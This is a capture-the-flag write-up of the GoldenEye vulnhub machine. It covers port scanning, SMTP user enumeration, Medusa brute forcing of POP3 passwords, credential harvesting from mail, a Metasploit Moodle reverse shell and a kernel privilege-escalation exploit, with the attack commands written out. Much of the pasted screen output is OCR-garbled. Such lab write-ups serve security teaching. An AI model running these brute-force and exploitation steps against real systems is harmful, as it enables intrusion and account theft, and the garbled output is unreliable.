GoldenEye CTF

This article covers a brief walk-through of a Goldeneye themed vulnhub system. Based on the systems description, brute forcing was going to be key;

  • No extra tools other than what’s on Kali by default
  • Any brute forcing will only need fasttrack.txt or less

Scanning & Enumeration

I started by port scanning the system. POP3 looks like a good brute force candidate.

nmap -sv -p- 
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-17 18:41 EST 
Nmap scan report for 192.168.0.108 
Host is up (ø.oee23s latency). 
Not shown: 65531 closed ports 
PORT 
25/tcp 
86/tcp 
STATE 
open 
open 
55006/tcp open 
55007/tcp open 
MAC Address: 08 
SERVICE 
smtp 
http 
ss1/pop3 
pop3 
27;32 
VERSION 
Postfix smtpd 
Apache httpd 2-4.7 ( (Ubuntu)) 
Dovecot pop3d 
Dovecot pop3d 
(Oracle VirtualBox virtual NIC)

Heading to the web server, a login console also appears to be available:

GoldenEye primary Admin X + 
@ 192.168.0.108 
Most Visited O Offensive Security OKati Linux OKati Docs O Kali Tools O Exploit-DB Aircrack-ng 
Severnaya Auxiliary Control Station 
SECRET 
Accessing Server Identity 
Server Name: ..... ..... ...... . 
GOLDENEYE 
User: UNKNOWN 
Naviagate to /sev-home/ to logi

The source code (terminal.js) which shows this message reveals two potential user names, and an encoded password:

Golden* Primary Admin S x http://192.168.O.108/termiT x + 
@ view-source:http://192.168.O.108/terminaLjs 
MostVisited @Offensive Security @ KaliLinux @ Kali Docs @KaliTools @Exploit-DB •Aircrack-ng @Kali Forums 
var data I 
GoldenEyeText: •espanxbr/>Severnaya Auxiliary Control SECRET Server Id 
//Boris, make sure you update your default passwrd. 
//hy sources say M16 maybe planning to infiltrate. 
//Be on the lookout for any suspicious network traffic.. 
// I encoded you belm€... 
/ 'BTU Natalya says she can break your codes 
var altEIements 
for (var j — 
e. j < aUEtement5. length; 
var currentEtementId - aUEtement51jl.id; 
var currentEtementIdContent — datalOllcurrentEIementIdl; 
var element — docurnt.getEtementById(currentEIerntId); 
var devTypeText - currentEIementIdContent:

I decoded the password (InvincibleHack3r) with BurpSuite:

вигр 
- Тетрогагу Propct 
Вир RepeatU Не[р 
И;ег 
е 
rts 
Теп О нех 
теп О нех 
э 
о 
T.rqet Ргоху Spider 
•ntwder 
Repeater 
Сот р.тг 
Project 
decode

Connecting to the SMTP port, I used the VRFY command to check if these users exist on the system:

telnet 192. 25 
Trying 192. 168.0. 108. 
connected to 
Escape character is ' 
220 ubuntu GoldentEye SMTP Electronic-mail agent 
VRFY test 
550 5.1.1 etest>: Recipient address rejected: user unknown in local recipient table 
VRFY Natalya 
252 2.ø.o Natalya 
VRFY boris 
252 2.ø.o boris 
VRFY james 
550 5.1.1 <james:•: 
Recipient address rejected: 
User unknown in local recipient table

Logging in with the Boris/InvincibleHack3r account we appear to hit a dead end:

192.168.0.108/sev• home/ x + 
G) 192.168.0.108/sev-home/ 
•ecurity O Kali Linux O Kali Docs O Kali Tools O Exp'Oit-DB Aircrack-nq O Kali Forums O NetHunter O Kali Training Gettinq Started 
GOLDENEY 
is a Top Secret Soviet oribtal weapons project 
Since you have access you definitely hold a Top Secret 
clearance and quality to be a certified GoldenEye Netw'ork 
operator (GNO) 
Please email qualified9NO supervisor to•receive the 
online GoldenEye O*rators Training to become an 
uninistrator ye system 
have configured rpOp3 rvice to ru 
very high 
default port' •

Brute Forcing

Using Medusa and the fasttrack.txt wordlist, I attempted to brute force the passwords for the two accounts previously identified:

medusa -u boris -P /usr/share/wordlists/fasttrack.txt -h 192.168.0.108 -M pop3 -n 55007 -t 20 -b -v 0
ACCOUNT 
ACCOUNT 
ACCOUNT 
ACCOUNT 
[ pop3] 
CHECK: 
CHECK . 
• Ipop31 
[ pop3] 
CHECK: 
(pop31 
FOUND : 
Host : 
Host: 
Host : 
Host: 
192.168.ø. 
192.168.0. 108 
192.168.0. 108 
192. 168.0, 108 
(1 Of 
(1 ot 
(I Of 
user: 
1, complete) 
1, complete) 
I, complete) 
boris Password: 
User: boris (I Of I, 
user: borts (1 ot 1, 
User: boris (I Of I, 
( succESSl 
secretl! 
e complete) 
O complete) 
e complete) 
password: Company123 (139 Of 221 complete) 
Passwo rd: 
companyl! (140 ot 221 complete) 
Passwo rd : 
secretl! (141 Of 221 complete)

Valid Account: boris:secret1!

medusa -u natalya -P /usr/share/wordlists/fasttrack.txt -h 192.168.0.108 -M pop3 -n 55007 -t 20 -b -f
ACCOUNT 
ACCOUNT 
ACCOUNT 
CHECK: 
CHECK: 
FOUND: 
• Ipop31 H 
( pop3] 
(pop31 
[pop31 
Host: 
Host: 
Host: 
192. 
192.168.0. 108 
192. 168.0. 108 
of 
(1 of 
user: 
o complete) User: natal ya 
t I, O comp Lete) 
1, complete) User: natalya of 
1, O complete) 
1, O complete) User: natalya (1 of 
1, O complete) 
natalya Password: bird Isoccessl 
Password 
password: 
Password: 
password! (10 
I complete) 
sqlaccount (101 of 221 complete) 
bird (102 of 221 complete)

Valid Account: natalya:bird

I configured Claws mail to see if anything interesting appeared in these email accounts:

e 
File Edit View Message Tools 
Get Mail 
Send Compose 
subject) 
(No Subject) 
Inbox 
1 item selected (9038) 
S ubject 
wea, Apr . 
Boris, 
Configuration Help 
- Claws Mail 3.17.3 
9 
Wastebin 
Reply 
All 
From 
Sender 
Date 
Spam 
Next 
22 
natalya@ubuntu 21/04/95(Fri) 22: 
o 
Size 
oosal 
362B 
o new, O unread, 3 total (1.75Ka) 
Your cooperation with our syndicate witt pay off big. Attached are the final access codes 
for GoldenEye. Place them in a hidden file Within the root directory Of this server then 
remove from this email. There can only be one set of these acces codes, and we need to 
secure them for the final execution. If they are retrieved and captured our plan will crash 
and burn! 
Once Xenia gets access to the training site and becomes familiar with the GoldenEye 
Terminat codes we wilt push to our tinat stages. 
PS • Keep security tight or we witt be compromised.

This revealed more credentials:

username: xenia
password: RCP90rulez!

- Claws Mail 3.17.3 
File Edit View Message Tools Configuration Help 
Sond Compose Reply All Sender 
Get Mail 
S subject 
Forward 
9 
Wastebin Spam 
From 
root@uäuntu 
Next 
Date 
Size 
1023B 
• a Mailbox (MY 
Inbox 
sent 
Drafts 
Queue 
8 Wastebin 
o 
o 
(No 
Inbc» (1023 a) 
Subject 
From: root@ubuntu 
23 
O O 5 total (3.35K8) 
Clear 
Date: Tue, 29 Apr 1995 -0700 (PDT) 
Ok Natatyn I have a new student for you. As this is a new 
system please let me or boris know if you see any config 
issues, especially is it's related to security. 
..even if it's 
not, just enter it in under the guise of "security" .. 
.it'U 
get the change order escalated without much hassle : ) 
Ok, user creds are: 
username: xenia 
password: RCP90ruIez! 
Boris verified her as a valid contractor so just create the 
account ok? 
And if you didn't have the URL on outr internat Domain: 
severnaya-station.com/gnocertdir 
sure to edit your host file since you usually work 
remote off-network.... 
Since you' re a Linux user just point this servers IP to 
severnaya•station.com in /etc/hosts.

Logging into the URL mentioned in the email (severnaya-station.com/gnocertdir), presents us with a Moodle CMS website, where a message from Dr. Doak awaits..

Xenia X 
All 
Add Block 
Recent I (I) 
09:24 PM: Greetings 
AS a Contractor to our GoldenEye I you. your aCCtNJnt been complete, 
mote courses WII on yow dasnmard. you nave ary questions me via email, not here. 
My emal username is.. 
or Chak "The coctor 
Training Scientist • Sr Level SL4AVisu 
GolcɕnEye Operations Center Sector 
Level 14 - N02 - id;998623-1334 
campus a, Building 57, -8. sector 6, cube 
Phone 555-193-826 
cell 555-836044 
Office 555-846-9811 
p onaJ 555-826-9923 
Email: 
Please Recycle you print. Stay Green aka save the company money! 
"There's such a tning as Good Griet Just ask Charlie grown" • someguy 
"You miss ICXM ot the shots dont shoot at• Wayne G. 
THIS A SECURE MESSAGE DO NOT SENO UNLESS.

Poking around the Moodle application didn’t reveal much interesting, so time for more brute force:

medusa -u doak -P /usr/share/wordlists/fasttrack.txt -h 192.168.0.108 -M pop3 -n 55007 -t 20 -b -f
ACCOUNT CHECK: 
ACCOUNT FOUND: 
ACCOUNT CHECK: 
Ipop31 Host: 192.168.0.108 (1 of 1, e complete) User: doak (1 of 1, e complete) password: goat (121 of 221 complete) 
[pop31 Host: 192.168.0.108 User: doak Password: goat [SUCCESSI 
[pop31 Host: 192 . 168 . O. 108 (I Of I. O complete) User: doak (I Of I. I complete) Password: dev (122 Of 221 complete)

Valid Account: doak/goat

Logging into the email account, more credentials were uncovered:

username: dr_doak
password: 4England!

- Claws Mail 3.17.3 
File Edit View Message Tools 
Get Mail 
F older 
Send Compose 
Configuration Help 
Reply All 
Sender 
101 Subject 
(No Suble'-t) 
(No subject) 
(No subject) 
(No subject) 
(No subject) 
(No subiect) 
Forward 
9 
Wastebin Spam 
From 
Next 
'Date 
• 6 Mailbox (MY 
sent 
Drafts 
Queue 
8. wastebin 
O 
O 
root@ubuntu 
29/04/95(sat) 23 
alec@janus.boss 22/04/95(sat) 22 
natalya@ubuntu 21/04/95(Fri) 22: 
root@ubuntu 
10/04/95(Mon) 2 
root@127.o.o. l.c 02/04/90(Mon) 2 
Size 
3883 
1023B 
903B 
362B 
618B 
533B 
1 ted (588B) 
O O 6 total , 
Clear 
Subject 
From: doak@ubuntu 
Date: Tue, 30 Apr 1995 -0700 (PDT) 
James , 
If you're reading this, congrats you've gotten this far. You 
know how tradecraft works right? 
Because 1 don 't. Go to our training site and login to my 
account... -dig until you can exfiltrate further 
information. 
username: dr doak 
password: 4England!

Logging into the Moodle website using the Dr. Doak account, we find a s3cret.txt file:

'n My private files 
My private files - Mozilla F iretox 
G) severnaya-station.com/gnocertdir\user/filesvhp 
Most Visited Offensive Security O Kali Linux O Kali Docs Kali Tools O Exploit-DB 
You i' as Dt Doak LOOOuO 
My private files 
Home My profile My pnvate tiles 
r-hvigation 
• My home 
Site 
My p«otile 
Vien profile 
tor lames 
Manage my private tiles 
Forum 
Mes sages 
My private files 
Courses 
Settings 
My profile settings 
Edit profile 
• Chæve password 
Me-S s 
You are logged in as (Logout)

The contents of the file point to a .jpg file:

Open 
s3cret.txt 
e 
o t i U. _tOOtO 
o 
I was able to capture this apps admln cr3ds through clear txt. 
Text throughout most web apps within the GoldenEye servers are scanned, 
cannot add the cr3dentials here. 
Something juicy is Located here: /dirø07key/for-007 .jpg 
so 1 
Also as you may know, the RCP-90 Is vastly superior to any other weapon and 
License to Kill is the only way to play. 
Plain Tot 
Tab Width: S 
Lnl. coll 
INS

Downloading the image shows the following.

Dr_ DO* … it is Good luck 007

And since it wouldn’t be a CTF without exiftool being required..

Ex1F tags 
Tag 
in 
exif 
for. 007 .jpg 
'for-007 .jpg' ( 'Motorola i 
byte order): 
Image Description 
Manufacturer 
Resolution unit 
So f twa re 
Artist 
YCbCr Positioning 
x- Resolution 
Y -Resolution 
Exlf version 
I Value 
IGOIdenEye 
I Inch 
I linux 
I For James 
I Centred 
I unknown Exif Version 
Components Configuraly Cb Cr - 
User Comment 
FlashPixVersIon 
Colour Space 
IFor 007 
I FlashPix Version I.e 
I Internal error (unknown value 65535) 
echo "eFdpbnRlcjE50TV41Q=• I base64 -d 
xWinter1995x! roo :

password: xWinter1995x!

Using the this password, I was then able to login as an admin to the Moodle application:

2.23: Administration: Server: Environment - Mozilla Firefox 
'n 2.2.3: Administration: Sc x + 
@ severnaya-station.com/gnocertdir'admin/environmentphp 
MostVisited OOffensivesecurity O KaliLinux O KaliDocs OKa1iT001s OExp10it-DB 
GoldenEye Operators Training - Moodie 
Home Site administration Sewer Environment 
Aircrack-ng 
O Kali Forums O NetHunter 
You are as Ad mm (Logout) 
Up:late conunwnt 
My home 
Site 
My profile 
Courses 
Admin bookmarks 
this 
Settings 
My profile settings 
Site 
Notifications 
Registration 
Advanced teatwes 
Grades 
Location 
Plugns 
Environment 
Check your server suits current and tuture instalation requirements 
Moodle versi 
ph n 
ph p_ 
22.3 (guild: 20120514) v 
Server checks 
port 
should be installed and enabled best 
gd 
posture s 
The xmlrpc is needed hub and services and Mooale ne%wking 
should be md enabled best rewlts 
GD is of images. Such as user prone images not be available if 
should be and enabled best 
is used improve support. such as locale 
IS is required we mnning 2.2.3 
must irwtalled enabled 
version 8.3 is required and you ate running 9,322 
version is required you are running 5-5-9-1.4.24 
must irwtalled enabled 
should enabled best results

Remote Access

Metasploit includes a Moodle CMS module, which allows for code execution provided you have an admin account, so I thought I would give that a try.

ms-t.5 exploit( 
multi,'http,'moodle_cmd_exec) > show options 
Module options (exploit/mutti/http/moodte_cmd 
Name 
PASSWORD 
proxies 
RHOSTS 
RPORT 
SESSKEY 
SSI_ 
TARGETURI 
USERNAME 
VHOST 
Current Setting 
xwinter1995x! 
192.168.0. les 
false 
/ gnoce rtdir 
admin 
severnaya-station 
.com 
Requi red 
yes 
yes 
yes 
yes 
yes 
no 
exec) : 
Description 
Password to authenticate With 
A proxy chain of format 
The target address range or CIDR identifier 
The target port (TCP) 
The session key of the user to impersonate 
Negotiate SSL/TLS for outgoing connections 
The URI of the Moodie installation 
Username to authenticate with 
HTTP server virtual host 
Exploit target: 
Id 
Name 
Automatic

The module injects code into the aspell system path to gain a reverse shell, however my first attempt didn’t work out.

GoldenEye Operators Training - Moodle 
Home Site administration Server System paths 
My home 
Site 
My profile 
COWSeS 
this 
Setting s 
Site administration 
Regis t ration 
„ Actvanced features 
Courses 
GD version 
Path to du 
Path to a.sl»ll 
You as 
Blocks editing on 
System paths 
GD 2.x is installed v 
GO is installed 
the Version o' GD that is installed. The Version by is the that has 
change this unless you really know mat you're doing. 
Empty 
Path to du. Probably something like you enter this, that display directory contents will run rnLRh 
taster tor erectones vath a lot of tiles. 
X tktault: Lmptv 
To use spell-checking within the editor. you MUST have aspen 0.50 or later installed on pur server. and you must 
spcity the correct path to access the On systems. path is usually lusr/binJaspell, 
but it be Something

After some time poking around the site settings, this appeared to be because a different spell check system was being invoked. I headed over to Site Administration > Plugins > Text Editors and set the spell engine to PSpellShell:

C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\msohtmlclip\clip_image021.png

Success!

C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\msohtmlclip\clip_image022.png

Privilege Escalation

After doing a “uname -a” it appears the system was running Kernel 3.13.0-32-generic which is vulnerable to the following exploit: https://www.exploit-db.com/exploits/37292. I copied the exploit across from my Kali system:

C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\msohtmlclip\clip_image023.png

Unfortunately, gcc wasn’t available to compile the exploit, however does have the Clang compiler installed:

C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\msohtmlclip\clip_image024.png

I modified the exploit so references to gcc were replaced with clang, and compiled it. This generated some warnings, but did produce an “a.out” executable:

C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\msohtmlclip\clip_image025.png

Executing it we get a root shell:

C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\msohtmlclip\clip_image026.png

Checking out the /root directory, we can see a .flag.txt file:

C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\msohtmlclip\clip_image027.png

Visiting the URL shows the flag has been captured:

C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\msohtmlclip\clip_image028.png

Victory. It’s quite a fun challenge with a couple of small curve-balls. Could be improved by the addition of Defense Minister Dmitri Mishkin 😉

Image result for goldeneye gif